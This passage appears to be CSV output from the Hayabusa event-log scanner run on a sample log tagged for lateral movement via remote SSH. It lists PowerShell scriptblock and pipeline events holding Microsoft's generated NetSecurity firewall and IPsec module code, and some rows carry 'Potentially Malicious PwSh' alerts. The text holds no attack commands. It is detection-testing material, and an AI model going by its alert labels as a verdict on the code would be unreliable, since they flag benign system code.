[object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LogAllowed')) { [object]$__cmdletization_value = ${LogAllowed} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LogAllowed'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LogAllowed'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LogBlocked')) { [object]$__cmdletization_value = ${LogBlocked} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LogBlocked'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LogBlocked'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LogIgnored')) { [object]$__cmdletization_value = ${LogIgnored} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LogIgnored'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LogIgnored'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DisabledInterfaceAliases')) { [object]$__cmdletization_value = ${DisabledInterfaceAliases} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DisabledInterfaceAliases'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DisabledInterfaceAliases'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallProfile.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetFirewallProfile' -Alias '*'",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.700 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"dletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LogFileName')) { [object]$__cmdletization_value = ${LogFileName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LogFileName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LogFileName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LogMaxSizeKilobytes')) { [object]$__cmdletization_value = ${LogMaxSizeKilobytes} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LogMaxSizeKilobytes'; ParameterType = 'System.UInt64'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LogMaxSizeKilobytes'; ParameterType = 'System.UInt64'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LogAllowed')) { [object]$__cmdletization_value = ${LogAllowed} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LogAllowed'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LogAllowed'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LogBlocked')) { [object]$__cmdletization_value = ${LogBlocked} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LogBlocked'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LogBlocked'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LogIgnored')) { [object]$__cmdletization_value = ${LogIgnored} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LogIgnored'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LogIgnored'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DisabledInterfaceAliases')) { [object]$__cmdletization_value = ${DisabledInterfaceAliases} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DisabledInterfaceAliases'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DisabledInterfaceAliases'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallProfile.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetFirewallProfile' -Alias '*'",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.700 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.701 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.701 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Get-NetFirewallProfile"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.702 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Set-NetFirewallProfile"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.733 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetSecDeltaCollection' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.733 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetSecDeltaCollection' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } }",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.740 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.741 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.779 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetIPsecDoSPSetting' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function New-NetIPsecDospSetting { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] param( [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [string] ${Name}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${StateIdleTimeoutSeconds}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${PerIPRateLimitQueueIdleTimeoutSeconds}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${IpV6IPsecUnauthDscp}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${IpV6IPsecUnauthRateLimitBytesPerSec}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${IpV6IPsecUnauthPerIPRateLimitBytesPerSec}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint16] ${IpV6IPsecAuthDscp}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${IpV6IPsecAuthRateLimitBytesPerSec}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint16] ${IcmpV6Dscp}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${IcmpV6RateLimitBytesPerSec}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${IpV6FilterExemptDscp}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${IpV6FilterExemptRateLimitBytesPerSec}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint16] ${DefBlockExemptDscp}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${DefBlockExemptRateLimitBytesPerSec}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${MaxStateEntries}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${MaxPerIPRateLimitQueues}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospKeyModules] ${EnabledKeyingModules}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospFlags] ${FilteringFlags}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [WildcardPattern[]] ${PublicInterfaceAliases}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [WildcardPattern[]] ${PrivateInterfaceAliases}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${PublicV6Address}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${PrivateV6Address}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='cim:CreateInstance0')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Name')) { [object]$__cmdletization_value = ${Name} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('StateIdleTimeoutSeconds')) { [object]$__cmdletization_value = ${StateIdleTimeoutSeconds} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'StateIdleTimeoutSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'StateIdleTimeoutSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PerIPRateLimitQueueIdleTimeoutSeconds')) { [object]$__cmdletization_value = ${PerIPRateLimitQueueIdleTimeoutSeconds} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PerIPRateLimitQueueIdleTimeoutSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PerIPRateLimitQueueIdleTimeoutSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6IPsecUnauthDscp')) { [object]$__cmdletization_value = ${IpV6IPsecUnauthDscp} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecUnauthDscp'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecUnauthDscp'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6IPsecUnauthRateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IpV6IPsecUnauthRateLimitBytesPerSec} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecUnauthRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecUnauthRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6IPsecUnauthPerIPRateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IpV6IPsecUnauthPerIPRateLimitBytesPerSec} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecUnauthPerIPRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecUnauthPerIPRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6IPsecAuthDscp')) { [object]$__cmdletization_value = ${IpV6IPsecAuth",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.779 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetIPsecDoSPSetting' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function New-NetIPsecDospSetting { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] param( [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [string] ${Name}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${StateIdleTimeoutSeconds}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${PerIPRateLimitQueueIdleTimeoutSeconds}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${IpV6IPsecUnauthDscp}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${IpV6IPsecUnauthRateLimitBytesPerSec}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${IpV6IPsecUnauthPerIPRateLimitBytesPerSec}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint16] ${IpV6IPsecAuthDscp}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${IpV6IPsecAuthRateLimitBytesPerSec}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint16] ${IcmpV6Dscp}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${IcmpV6RateLimitBytesPerSec}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${IpV6FilterExemptDscp}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${IpV6FilterExemptRateLimitBytesPerSec}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint16] 